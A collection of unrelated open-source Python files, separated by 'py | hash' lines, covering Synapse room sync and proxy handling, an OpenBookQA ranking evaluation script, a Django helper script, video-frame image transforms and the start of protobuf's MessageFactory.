"type": "m.presence",
"content": format_user_presence_state(event, now),
}
for event in presence
],
"account_data": account_data_events,
"receipts": receipt,
"end": now_token.to_string(),
}
defer.returnValue(ret)
@defer.inlineCallbacks
def room_initial_sync(self, requester, room_id, pagin_config=None):
"""Capture the a snapshot of a room. If user is currently a member of
the room this will be what is currently in the room. If the user left
the room this will be what was in the room when they left.
Args:
requester(Requester): The user to get a snapshot for.
room_id(str): The room to get a snapshot of.
pagin_config(synapse.streams.config.PaginationConfig):
The pagination config used to determine how many messages to
return.
Raises:
AuthError if the user wasn't in the room.
Returns:
A JSON serialisable dict with the snapshot of the room.
"""
blocked = yield self.store.is_room_blocked(room_id)
if blocked:
raise SynapseError(403, "This room has been blocked on this server")
user_id = requester.user.to_string()
membership, member_event_id = yield self._check_in_room_or_world_readable(
room_id, user_id,
)
is_peeking = member_event_id is None
if membership == Membership.JOIN:
result = yield self._room_initial_sync_joined(
user_id, room_id, pagin_config, membership, is_peeking
)
elif membership == Membership.LEAVE:
result = yield self._room_initial_sync_parted(
user_id, room_id, pagin_config, membership, member_event_id, is_peeking
)
account_data_events = []
tags = yield self.store.get_tags_for_room(user_id, room_id)
if tags:
account_data_events.append({
"type": "m.tag",
"content": {"tags": tags},
})
account_data = yield self.store.get_account_data_for_room(user_id, room_id)
for account_data_type, content in account_data.items():
account_data_events.append({
"type": account_data_type,
"content": content,
})
result["account_data"] = account_data_events
defer.returnValue(result)
@defer.inlineCallbacks
def _room_initial_sync_parted(self, user_id, room_id, pagin_config,
membership, member_event_id, is_peeking):
room_state = yield self.store.get_state_for_events(
[member_event_id],
)
room_state = room_state[member_event_id]
limit = pagin_config.limit if pagin_config else None
if limit is None:
limit = 10
stream_token = yield self.store.get_stream_token_for_event(
member_event_id
)
messages, token = yield self.store.get_recent_events_for_room(
room_id,
limit=limit,
end_token=stream_token
)
messages = yield filter_events_for_client(
self.store, user_id, messages, is_peeking=is_peeking
)
start_token = StreamToken.START.copy_and_replace("room_key", token)
end_token = StreamToken.START.copy_and_replace("room_key", stream_token)
time_now = self.clock.time_msec()
defer.returnValue({
"membership": membership,
"room_id": room_id,
"messages": {
"chunk": [serialize_event(m, time_now) for m in messages],
"start": start_token.to_string(),
"end": end_token.to_string(),
},
"state": [serialize_event(s, time_now) for s in room_state.values()],
"presence": [],
"receipts": [],
})
@defer.inlineCallbacks
def _room_initial_sync_joined(self, user_id, room_id, pagin_config,
membership, is_peeking):
current_state = yield self.state.get_current_state(
room_id=room_id,
)
# TODO: These concurrently
time_now = self.clock.time_msec()
state = [
serialize_event(x, time_now)
for x in current_state.values()
]
now_token = yield self.hs.get_event_sources().get_current_token()
limit = pagin_config.limit if pagin_config else None
if limit is None:
limit = 10
room_members = [
m for m in current_state.values()
if m.type == EventTypes.Member
and m.content["membership"] == Membership.JOIN
]
presence_handler = self.hs.get_presence_handler()
@defer.inlineCallbacks
def get_presence():
# If presence is disabled, return an empty list
if not self.hs.config.use_presence:
defer.returnValue([])
states = yield presence_handler.get_states(
[m.user_id for m in room_members],
as_event=True,
)
defer.returnValue(states)
@defer.inlineCallbacks
def get_receipts():
receipts = yield self.store.get_linearized_receipts_for_room(
room_id,
to_key=now_token.receipt_key,
)
if not receipts:
receipts = []
defer.returnValue(receipts)
presence, receipts, (messages, token) = yield make_deferred_yieldable(
defer.gatherResults(
[
run_in_background(get_presence),
run_in_background(get_receipts),
run_in_background(
self.store.get_recent_events_for_room,
room_id,
limit=limit,
end_token=now_token.room_key,
)
],
consumeErrors=True,
).addErrback(unwrapFirstError),
)
messages = yield filter_events_for_client(
self.store, user_id, messages, is_peeking=is_peeking,
)
start_token = now_token.copy_and_replace("room_key", token)
end_token = now_token
time_now = self.clock.time_msec()
ret = {
"room_id": room_id,
"messages": {
"chunk": [serialize_event(m, time_now) for m in messages],
"start": start_token.to_string(),
"end": end_token.to_string(),
},
"state": state,
"presence": presence,
"receipts": receipts,
}
if not is_peeking:
ret["membership"] = membership
defer.returnValue(ret)
@defer.inlineCallbacks
def _check_in_room_or_world_readable(self, room_id, user_id):
try:
# check_user_was_in_room will return the most recent membership
# event for the user if:
# * The user is a non-guest user, and was ever in the room
# * The user is a guest user, and has joined the room
# else it will throw.
member_event = yield self.auth.check_user_was_in_room(room_id, user_id)
defer.returnValue((member_event.membership, member_event.event_id))
return
except AuthError:
visibility = yield self.state_handler.get_current_state(
room_id, EventTypes.RoomHistoryVisibility, ""
)
if (
visibility and
visibility.content["history_visibility"] == "world_readable"
):
defer.returnValue((Membership.JOIN, None))
return
raise AuthError(
403, "Guest access not allowed", errcode=Codes.GUEST_ACCESS_FORBIDDEN
)
|
py | 7dfae7df53cc9811a91b79a3be44a90fb3cbd9c7 | import json
import collections
import numpy as np
from tqdm import tqdm
import operator
Entry = collections.namedtuple("Entry","qid fact1 fact2 hyp1 hyp2 hyp3 hyp4 ans label")
def read_ranked(fname,topk):
fd = open(fname,"r").readlines()
ranked={}
for line in tqdm(fd,desc="Ranking "+fname+" :"):
line = line.strip()
out = json.loads(line)
ranked[out["id"]]=out["ext_fact_global_ids"][0:topk]
return ranked
def read_knowledge(fname):
lines = open(fname,"r").readlines()
knowledgemap = {}
knowledge=[]
for index,fact in tqdm(enumerate(lines),desc="Reading Knowledge:"):
f=fact.strip().replace('"',"").lower()
knowledgemap[f]=index
knowledge.append(f)
return knowledgemap,knowledge
def read_hyp_dataset(fname):
fd = open(fname,"r").readlines()
dataset = {}
for line in tqdm(fd,desc="Reading Datasets:"):
line = line.strip().split("\t")
qid = line[0]
passage = line[1].split(" . ")
choice = line[2:6]
label = line[6]
ans = choice[int(label)]
fact1 = passage[0].strip()
fact2 = passage[1].strip()
entry = Entry(qid=qid,fact1=fact1,fact2=fact2,hyp1=choice[0],hyp2=choice[1],hyp3=choice[2],hyp4=choice[3],ans=ans,label=int(label))
dataset[qid]=entry
return dataset
def merge_ranked(ranked):
tmerged={}
merged={}
for qidx in tqdm(ranked.keys(),desc="Merging"):
qid = qidx.split("__")[0]
choice = qidx[-1]
if qid not in tmerged:
tmerged[qid]={}
scores=ranked[qidx]
for tup in scores:
if tup[0] not in tmerged[qid]:
tmerged[qid][tup[0]]=tup[1]
else:
tmerged[qid][tup[0]]+=tup[1]
sorted_x = sorted(tmerged[qid].items(), key=operator.itemgetter(1))
ranked_list=[]
for tup in reversed(sorted_x):
ranked_list.append(tup)
merged[qid]=ranked_list
# if qid == "8-343":
# print(merged[qid])
return merged
def score_ranked_fact1(ranked,datasets,knowledgemap,knowledge,is_merged=False):
topklist = [1,3,5,10,20,50]
choices = ["__ch_0","__ch_1","__ch_2","__ch_3"]
for dataset in datasets:
counts=[0,0,0,0,0,0]
counts_ans=[0,0,0,0,0,0]
pr=5
print("For Dataset:")
for index,topk in enumerate(topklist):
for qid,entry in dataset.items():
fact1 = entry.fact1
label = entry.label
fidx = knowledgemap[fact1.strip().lower()]
if pr<5:
print(qid,fact1,fidx)
found = False
found_ans = False
for choice in choices:
if not is_merged:
idx = qid+choice
else:
idx=qid
ranked_list=ranked[idx]
processed = [tup[0] for tup in ranked_list]
if fidx in processed[0:topk]:
found=True
if choice[-1]==str(label) and fidx in processed[0:topk]:
found_ans=True
if pr<5:
for f in processed[0:1]:
prob=0
for tup in ranked_list:
if tup[0] == f:
prob = tup[1]
print(qid,"\t","\t",choice,knowledge[f],f,prob)
pr+=1
if found:
counts[index]+=1
if found_ans:
counts_ans[index]+=1
print("Counts@\t1,3,5,10,20,50\n")
print("\t",counts)
print("\t",counts_ans)
knowledgemap,knowledge = read_knowledge("../data/knowledge/openbook.txt")
test = read_hyp_dataset("../data/hypothesis/hyp-gold-test.tsv")
train = read_hyp_dataset("../data/hypothesis/hyp-gold-train.tsv")
val = read_hyp_dataset("../data/hypothesis/hyp-gold-val.tsv")
ranked_spacy = read_ranked("../data/ranked/scapy-openbook.json",50)
ranked_sts = read_ranked("../data/ranked/sts-openbook.json",50)
ranked_trained = read_ranked("../data/ranked/sts-trained-openbook.json",50)
ranked_tfidf = read_ranked("../data/ranked/tfidf-openbook.json",50)
ranked_qnli = read_ranked("../data/ranked/qnli-openbook.json",50)
ranked_simple = read_ranked("../data/ranked/simplebert-openbook.json",50)
ranked_cnn = read_ranked("../data/ranked/cnn-openbook.json",50)
print("Scoring Unmerged")
# for ranked in [ranked_spacy,ranked_sts,ranked_trained,ranked_tfidf,ranked_qnli,ranked_simple,ranked_cnn]:
for ranked,name in zip([ranked_tfidf,ranked_sts,ranked_trained,ranked_cnn,ranked_simple],["tfidf","sts","trained","cnn","simple"]):
print("Model:",name)
print("Val")
score_ranked_fact1(ranked,[val],knowledgemap,knowledge,is_merged=False)
print("Test")
score_ranked_fact1(ranked,[test],knowledgemap,knowledge,is_merged=False)
|
py | 7dfae8b786b9db52675be4e5099a992e35ffa328 | # Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import logging
import re
from typing import Optional, Tuple
from urllib.request import getproxies_environment, proxy_bypass_environment
import attr
from zope.interface import implementer
from twisted.internet import defer
from twisted.internet.endpoints import HostnameEndpoint, wrapClientTLS
from twisted.python.failure import Failure
from twisted.web.client import URI, BrowserLikePolicyForHTTPS, _AgentBase
from twisted.web.error import SchemeNotSupported
from twisted.web.http_headers import Headers
from twisted.web.iweb import IAgent, IPolicyForHTTPS
from synapse.http.connectproxyclient import HTTPConnectProxyEndpoint
logger = logging.getLogger(__name__)
_VALID_URI = re.compile(br"\A[\x21-\x7e]+\Z")
@attr.s
class ProxyCredentials:
username_password = attr.ib(type=bytes)
def as_proxy_authorization_value(self) -> bytes:
"""
Return the value for a Proxy-Authorization header (i.e. 'Basic abdef==').
Returns:
A transformation of the authentication string the encoded value for
a Proxy-Authorization header.
"""
# Encode as base64 and prepend the authorization type
return b"Basic " + base64.encodebytes(self.username_password)
@implementer(IAgent)
class ProxyAgent(_AgentBase):
"""An Agent implementation which will use an HTTP proxy if one was requested
Args:
reactor: twisted reactor to place outgoing
connections.
proxy_reactor: twisted reactor to use for connections to the proxy server
reactor might have some blacklisting applied (i.e. for DNS queries),
but we need unblocked access to the proxy.
contextFactory (IPolicyForHTTPS): A factory for TLS contexts, to control the
verification parameters of OpenSSL. The default is to use a
`BrowserLikePolicyForHTTPS`, so unless you have special
requirements you can leave this as-is.
connectTimeout (Optional[float]): The amount of time that this Agent will wait
for the peer to accept a connection, in seconds. If 'None',
HostnameEndpoint's default (30s) will be used.
This is used for connections to both proxies and destination servers.
bindAddress (bytes): The local address for client sockets to bind to.
pool (HTTPConnectionPool|None): connection pool to be used. If None, a
non-persistent pool instance will be created.
use_proxy (bool): Whether proxy settings should be discovered and used
from conventional environment variables.
"""
def __init__(
self,
reactor,
proxy_reactor=None,
contextFactory: Optional[IPolicyForHTTPS] = None,
connectTimeout=None,
bindAddress=None,
pool=None,
use_proxy=False,
):
contextFactory = contextFactory or BrowserLikePolicyForHTTPS()
_AgentBase.__init__(self, reactor, pool)
if proxy_reactor is None:
self.proxy_reactor = reactor
else:
self.proxy_reactor = proxy_reactor
self._endpoint_kwargs = {}
if connectTimeout is not None:
self._endpoint_kwargs["timeout"] = connectTimeout
if bindAddress is not None:
self._endpoint_kwargs["bindAddress"] = bindAddress
http_proxy = None
https_proxy = None
no_proxy = None
if use_proxy:
proxies = getproxies_environment()
http_proxy = proxies["http"].encode() if "http" in proxies else None
https_proxy = proxies["https"].encode() if "https" in proxies else None
no_proxy = proxies["no"] if "no" in proxies else None
# Parse credentials from https proxy connection string if present
self.https_proxy_creds, https_proxy = parse_username_password(https_proxy)
self.http_proxy_endpoint = _http_proxy_endpoint(
http_proxy, self.proxy_reactor, **self._endpoint_kwargs
)
self.https_proxy_endpoint = _http_proxy_endpoint(
https_proxy, self.proxy_reactor, **self._endpoint_kwargs
)
self.no_proxy = no_proxy
self._policy_for_https = contextFactory
self._reactor = reactor
def request(self, method, uri, headers=None, bodyProducer=None):
"""
Issue a request to the server indicated by the given uri.
Supports `http` and `https` schemes.
An existing connection from the connection pool may be used or a new one may be
created.
See also: twisted.web.iweb.IAgent.request
Args:
method (bytes): The request method to use, such as `GET`, `POST`, etc
uri (bytes): The location of the resource to request.
headers (Headers|None): Extra headers to send with the request
bodyProducer (IBodyProducer|None): An object which can generate bytes to
make up the body of this request (for example, the properly encoded
contents of a file for a file upload). Or, None if the request is to
have no body.
Returns:
Deferred[IResponse]: completes when the header of the response has
been received (regardless of the response status code).
Can fail with:
SchemeNotSupported: if the uri is not http or https
twisted.internet.error.TimeoutError if the server we are connecting
to (proxy or destination) does not accept a connection before
connectTimeout.
... other things too.
"""
uri = uri.strip()
if not _VALID_URI.match(uri):
raise ValueError("Invalid URI {!r}".format(uri))
parsed_uri = URI.fromBytes(uri)
pool_key = (parsed_uri.scheme, parsed_uri.host, parsed_uri.port)
request_path = parsed_uri.originForm
should_skip_proxy = False
if self.no_proxy is not None:
should_skip_proxy = proxy_bypass_environment(
parsed_uri.host.decode(),
proxies={"no": self.no_proxy},
)
if (
parsed_uri.scheme == b"http"
and self.http_proxy_endpoint
and not should_skip_proxy
):
# Cache *all* connections under the same key, since we are only
# connecting to a single destination, the proxy:
pool_key = ("http-proxy", self.http_proxy_endpoint)
endpoint = self.http_proxy_endpoint
request_path = uri
elif (
parsed_uri.scheme == b"https"
and self.https_proxy_endpoint
and not should_skip_proxy
):
connect_headers = Headers()
# Determine whether we need to set Proxy-Authorization headers
if self.https_proxy_creds:
# Set a Proxy-Authorization header
connect_headers.addRawHeader(
b"Proxy-Authorization",
self.https_proxy_creds.as_proxy_authorization_value(),
)
endpoint = HTTPConnectProxyEndpoint(
self.proxy_reactor,
self.https_proxy_endpoint,
parsed_uri.host,
parsed_uri.port,
headers=connect_headers,
)
else:
# not using a proxy
endpoint = HostnameEndpoint(
self._reactor, parsed_uri.host, parsed_uri.port, **self._endpoint_kwargs
)
logger.debug("Requesting %s via %s", uri, endpoint)
if parsed_uri.scheme == b"https":
tls_connection_creator = self._policy_for_https.creatorForNetloc(
parsed_uri.host, parsed_uri.port
)
endpoint = wrapClientTLS(tls_connection_creator, endpoint)
elif parsed_uri.scheme == b"http":
pass
else:
return defer.fail(
Failure(
SchemeNotSupported("Unsupported scheme: %r" % (parsed_uri.scheme,))
)
)
return self._requestWithEndpoint(
pool_key, endpoint, method, parsed_uri, headers, bodyProducer, request_path
)
def _http_proxy_endpoint(proxy: Optional[bytes], reactor, **kwargs):
"""Parses an http proxy setting and returns an endpoint for the proxy
Args:
proxy: the proxy setting in the form: [<username>:<password>@]<host>[:<port>]
Note that compared to other apps, this function currently lacks support
for specifying a protocol schema (i.e. protocol://...).
reactor: reactor to be used to connect to the proxy
kwargs: other args to be passed to HostnameEndpoint
Returns:
interfaces.IStreamClientEndpoint|None: endpoint to use to connect to the proxy,
or None
"""
if proxy is None:
return None
# Parse the connection string
host, port = parse_host_port(proxy, default_port=1080)
return HostnameEndpoint(reactor, host, port, **kwargs)
def parse_username_password(proxy: bytes) -> Tuple[Optional[ProxyCredentials], bytes]:
"""
Parses the username and password from a proxy declaration e.g
username:password@hostname:port.
Args:
proxy: The proxy connection string.
Returns
An instance of ProxyCredentials and the proxy connection string with any credentials
stripped, i.e u:p@host:port -> host:port. If no credentials were found, the
ProxyCredentials instance is replaced with None.
"""
if proxy and b"@" in proxy:
# We use rsplit here as the password could contain an @ character
credentials, proxy_without_credentials = proxy.rsplit(b"@", 1)
return ProxyCredentials(credentials), proxy_without_credentials
return None, proxy
def parse_host_port(hostport: bytes, default_port: int = None) -> Tuple[bytes, int]:
"""
Parse the hostname and port from a proxy connection byte string.
Args:
hostport: The proxy connection string. Must be in the form 'host[:port]'.
default_port: The default port to return if one is not found in `hostport`.
Returns:
A tuple containing the hostname and port. Uses `default_port` if one was not found.
"""
if b":" in hostport:
host, port = hostport.rsplit(b":", 1)
try:
port = int(port)
return host, port
except ValueError:
# the thing after the : wasn't a valid port; presumably this is an
# IPv6 address.
pass
return hostport, default_port
|
py | 7dfae907fe77937a3b058a123e75d492dce8d78e | import os
import sys
import subprocess
import shutil
COMMANDS_LIST = ('testmanage', 'test', 'release')
COMMANDS_INFO = {
'testmanage': 'run manage for test project',
'test': 'run tests (eq. "testmanage test")',
'release': 'make distributive and upload to pypi (setup.py bdist_wheel upload)'
}
def testmanage(*args):
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tests.settings")
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'tests'))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'tests', 'apps'))
from django.core.management import execute_from_command_line
execute_from_command_line(['manage.py'] + list(args))
def test(*args):
testmanage('test', *args)
def release(*args):
root_dir = os.path.dirname(os.path.abspath(__file__))
shutil.rmtree(os.path.join(root_dir, 'build'), ignore_errors=True)
shutil.rmtree(os.path.join(root_dir, 'dist'), ignore_errors=True)
shutil.rmtree(os.path.join(root_dir, 'transtool.egg-info'), ignore_errors=True)
subprocess.call(['python', 'setup.py', 'sdist', 'bdist_wheel'])
subprocess.call(['twine', 'upload', 'dist/*'])
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] in COMMANDS_LIST:
locals()[sys.argv[1]](*sys.argv[2:])
else:
print('Available commands:')
for c in COMMANDS_LIST:
print(c + ' - ' + COMMANDS_INFO[c])
|
py | 7dfae9e1a011b902bf063ccdbb98c01e0c216b4f | cys = ["İstanbul", "Ankara", "İzmir", "Samsun"];i = 0
while i < len(cys):print(f"{i+1}-{cys[i]}");i+=1 |
py | 7dfaec87424830ab4880fdb28bd5a9833f70f4e0 | import torchvision
import random
from PIL import Image, ImageOps
import numpy as np
import numbers
import math
import torch
class GroupRandomCrop(object):
def __init__(self, size):
if isinstance(size, numbers.Number):
self.size = (int(size), int(size))
else:
self.size = size
def __call__(self, img_group):
w, h = img_group[0].size
th, tw = self.size
out_images = list()
x1 = random.randint(0, w - tw)
y1 = random.randint(0, h - th)
for img in img_group:
assert(img.size[0] == w and img.size[1] == h)
if w == tw and h == th:
out_images.append(img)
else:
out_images.append(img.crop((x1, y1, x1 + tw, y1 + th)))
return out_images
class GroupCenterCrop(object):
def __init__(self, size):
self.worker = torchvision.transforms.CenterCrop(size)
def __call__(self, img_group):
return [self.worker(img) for img in img_group]
class GroupRandomHorizontalFlip(object):
"""Randomly horizontally flips the given PIL.Image with a probability of 0.5
"""
def __init__(self, is_flow=False):
self.is_flow = is_flow
def __call__(self, img_group, is_flow=False):
v = random.random()
if v < 0.5:
ret = [img.transpose(Image.FLIP_LEFT_RIGHT) for img in img_group]
if self.is_flow:
for i in range(0, len(ret), 2):
ret[i] = ImageOps.invert(ret[i]) # invert flow pixel values when flipping
return ret
else:
return img_group
class GroupNormalize(object):
def __init__(self, mean, std):
self.mean = mean
self.std = std
def __call__(self, tensor):
rep_mean = self.mean * (tensor.size()[0]//len(self.mean))
rep_std = self.std * (tensor.size()[0]//len(self.std))
# TODO: make efficient
for t, m, s in zip(tensor, rep_mean, rep_std):
t.sub_(m).div_(s)
return tensor
class GroupScale(object):
""" Rescales the input PIL.Image to the given 'size'.
'size' will be the size of the smaller edge.
For example, if height > width, then image will be
rescaled to (size * height / width, size)
size: size of the smaller edge
interpolation: Default: PIL.Image.BILINEAR
"""
def __init__(self, size, interpolation=Image.BILINEAR):
self.worker = torchvision.transforms.Scale(size, interpolation)
def __call__(self, img_group):
return [self.worker(img) for img in img_group]
class GroupOverSample(object):
def __init__(self, crop_size, scale_size=None):
self.crop_size = crop_size if not isinstance(crop_size, int) else (crop_size, crop_size)
if scale_size is not None:
self.scale_worker = GroupScale(scale_size)
else:
self.scale_worker = None
def __call__(self, img_group):
if self.scale_worker is not None:
img_group = self.scale_worker(img_group)
image_w, image_h = img_group[0].size
crop_w, crop_h = self.crop_size
offsets = GroupMultiScaleCrop.fill_fix_offset(False, image_w, image_h, crop_w, crop_h)
oversample_group = list()
for o_w, o_h in offsets:
normal_group = list()
flip_group = list()
for i, img in enumerate(img_group):
crop = img.crop((o_w, o_h, o_w + crop_w, o_h + crop_h))
normal_group.append(crop)
flip_crop = crop.copy().transpose(Image.FLIP_LEFT_RIGHT)
if img.mode == 'L' and i % 2 == 0:
flip_group.append(ImageOps.invert(flip_crop))
else:
flip_group.append(flip_crop)
oversample_group.extend(normal_group)
oversample_group.extend(flip_group)
return oversample_group
class GroupMultiScaleCrop(object):
def __init__(self, input_size, scales=None, max_distort=1, fix_crop=True, more_fix_crop=True):
self.scales = scales if scales is not None else [1, 875, .75, .66]
self.max_distort = max_distort
self.fix_crop = fix_crop
self.more_fix_crop = more_fix_crop
self.input_size = input_size if not isinstance(input_size, int) else [input_size, input_size]
self.interpolation = Image.BILINEAR
def __call__(self, img_group):
im_size = img_group[0].size
crop_w, crop_h, offset_w, offset_h = self._sample_crop_size(im_size)
crop_img_group = [img.crop((offset_w, offset_h, offset_w + crop_w, offset_h + crop_h)) for img in img_group]
ret_img_group = [img.resize((self.input_size[0], self.input_size[1]), self.interpolation)
for img in crop_img_group]
return ret_img_group
def _sample_crop_size(self, im_size):
image_w, image_h = im_size[0], im_size[1]
# find a crop size
base_size = min(image_w, image_h)
crop_sizes = [int(base_size * x) for x in self.scales]
crop_h = [self.input_size[1] if abs(x - self.input_size[1]) < 3 else x for x in crop_sizes]
crop_w = [self.input_size[0] if abs(x - self.input_size[0]) < 3 else x for x in crop_sizes]
pairs = []
for i, h in enumerate(crop_h):
for j, w in enumerate(crop_w):
if abs(i - j) <= self.max_distort:
pairs.append((w, h))
crop_pair = random.choice(pairs)
if not self.fix_crop:
w_offset = random.randint(0, image_w - crop_pair[0])
h_offset = random.randint(0, image_h - crop_pair[1])
else:
w_offset, h_offset = self._sample_fix_offset(image_w, image_h, crop_pair[0], crop_pair[1])
return crop_pair[0], crop_pair[1], w_offset, h_offset
def _sample_fix_offset(self, image_w, image_h, crop_w, crop_h):
offsets = self.fill_fix_offset(self.more_fix_crop, image_w, image_h, crop_w, crop_h)
return random.choice(offsets)
@staticmethod
def fill_fix_offset(more_fix_crop, image_w, image_h, crop_w, crop_h):
w_step = (image_w - crop_w) // 4
h_step = (image_h - crop_h) // 4
ret = list()
ret.append((0, 0)) # upper left
ret.append((4 * w_step, 0)) # upper right
ret.append((0, 4 * h_step)) # lower left
ret.append((4 * w_step, 4 * h_step)) # lower right
ret.append((2 * w_step, 2 * h_step)) # center
if more_fix_crop:
ret.append((0, 2 * h_step)) # center left
ret.append((4 * w_step, 2 * h_step)) # center right
ret.append((2 * w_step, 4 * h_step)) # lower center
ret.append((2 * w_step, 0 * h_step)) # upper center
ret.append((1 * w_step, 1 * h_step)) # upper left quarter
ret.append((3 * w_step, 1 * h_step)) # upper right quarter
ret.append((1 * w_step, 3 * h_step)) # lower left quarter
ret.append((3 * w_step, 3 * h_step)) # lower righ quarter
return ret
class GroupRandomSizedCrop(object):
"""Random crop the given PIL.Image to a random size of (0.08 to 1.0) of the original size
and and a random aspect ratio of 3/4 to 4/3 of the original aspect ratio
This is popularly used to train the Inception networks
size: size of the smaller edge
interpolation: Default: PIL.Image.BILINEAR
"""
def __init__(self, size, interpolation=Image.BILINEAR):
self.size = size
self.interpolation = interpolation
def __call__(self, img_group):
for attempt in range(10):
area = img_group[0].size[0] * img_group[0].size[1]
target_area = random.uniform(0.08, 1.0) * area
aspect_ratio = random.uniform(3. / 4, 4. / 3)
w = int(round(math.sqrt(target_area * aspect_ratio)))
h = int(round(math.sqrt(target_area / aspect_ratio)))
if random.random() < 0.5:
w, h = h, w
if w <= img_group[0].size[0] and h <= img_group[0].size[1]:
x1 = random.randint(0, img_group[0].size[0] - w)
y1 = random.randint(0, img_group[0].size[1] - h)
found = True
break
else:
found = False
x1 = 0
y1 = 0
if found:
out_group = list()
for img in img_group:
img = img.crop((x1, y1, x1 + w, y1 + h))
assert(img.size == (w, h))
out_group.append(img.resize((self.size, self.size), self.interpolation))
return out_group
else:
# Fallback
scale = GroupScale(self.size, interpolation=self.interpolation)
crop = GroupRandomCrop(self.size)
return crop(scale(img_group))
class Stack(object):
def __init__(self, roll=False):
self.roll = roll
def __call__(self, img_group):
if img_group[0].mode == 'L':
return np.concatenate([np.expand_dims(x, 2) for x in img_group], axis=2)
elif img_group[0].mode == 'RGB':
if self.roll:
return np.concatenate([np.array(x)[:, :, ::-1] for x in img_group], axis=2)
else:
return np.concatenate(img_group, axis=2)
class ToTorchFormatTensor(object):
""" Converts a PIL.Image (RGB) or numpy.ndarray (H x W x C) in the range [0, 255]
to a torch.FloatTensor of shape (C x H x W) in the range [0.0, 1.0] """
def __init__(self, div=True):
self.div = div
def __call__(self, pic):
if isinstance(pic, np.ndarray):
# handle numpy array
img = torch.from_numpy(pic).permute(2, 0, 1).contiguous()
else:
# handle PIL Image
img = torch.ByteTensor(torch.ByteStorage.from_buffer(pic.tobytes()))
img = img.view(pic.size[1], pic.size[0], len(pic.mode))
# put it from HWC to CHW format
# yikes, this transpose takes 80% of the loading time/CPU
img = img.transpose(0, 1).transpose(0, 2).contiguous()
return img.float().div(255) if self.div else img.float()
class IdentityTransform(object):
def __call__(self, data):
return data
if __name__ == "__main__":
trans = torchvision.transforms.Compose([
GroupScale(256),
GroupRandomCrop(224),
Stack(),
ToTorchFormatTensor(),
GroupNormalize(
mean=[.485, .456, .406],
std=[.229, .224, .225]
)]
)
im = Image.open('../tensorflow-model-zoo.torch/lena_299.png')
color_group = [im] * 3
rst = trans(color_group)
gray_group = [im.convert('L')] * 9
gray_rst = trans(gray_group)
trans2 = torchvision.transforms.Compose([
GroupRandomSizedCrop(256),
Stack(),
ToTorchFormatTensor(),
GroupNormalize(
mean=[.485, .456, .406],
std=[.229, .224, .225])
])
print(trans2(color_group)) |
py | 7dfaec88e15e176adb7363c288c53d189b37a294 | # Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Provides a factory class for generating dynamic messages.
The easiest way to use this class is if you have access to the FileDescriptor
protos containing the messages you want to create you can just do the following:
message_classes = message_factory.GetMessages(iterable_of_file_descriptors)
my_proto_instance = message_classes['some.proto.package.MessageName']()
"""
__author__ = '[email protected] (Matt Toia)'
from google.protobuf.internal import api_implementation
from google.protobuf import descriptor_pool
from google.protobuf import message
if api_implementation.Type() == 'cpp':
from google.protobuf.pyext import cpp_message as message_impl
else:
from google.protobuf.internal import python_message as message_impl
# The type of all Message classes.
_GENERATED_PROTOCOL_MESSAGE_TYPE = message_impl.GeneratedProtocolMessageType
class MessageFactory(object):
"""Factory for creating Proto2 messages from descriptors in a pool."""
def __init__(self, pool=None):
"""Initializes a new factory."""
self.pool = pool or descriptor_pool.DescriptorPool()
# local cache of all classes built from protobuf descriptors
self._classes = {}
def GetPrototype(self, descriptor):
"""Obtains a proto2 message class based on the passed in descriptor.
Passing a descriptor with a fully qualified name matching a previous
invocation will cause the same class to be returned.
Args:
descriptor: The descriptor to build from.
Returns:
A class describing the passed in descriptor.
"""
if descriptor not in self._classes:
result_class = self.CreatePrototype(descriptor)
# The assignment to _classes is redundant for the base implementation, but
# might avoid confusion in cases where CreatePrototype gets overridden and
# does not call the base implementation.
self._classes[descriptor] = result_class
return result_class
return self._classes[descriptor]
def CreatePrototype(self, descriptor):
"""Builds a proto2 message class based on the passed in descriptor.
Don't call this function directly, it always creates a new class. Call
GetPrototype() instead. This method is meant to be overridden in subblasses
to perform additional operations on the newly constructed class.
Args:
descriptor: The descriptor to build from.
Returns:
A class describing the passed in descriptor.
"""
descriptor_name = descriptor.name
if str is bytes: # PY2
descriptor_name = descriptor.name.encode('ascii', 'ignore')
result_class = _GENERATED_PROTOCOL_MESSAGE_TYPE(
descriptor_name,
(message.Message,),
{
'DESCRIPTOR': descriptor,
# If module not set, it wrongly points to message_factory module.
'__module__': None,
})
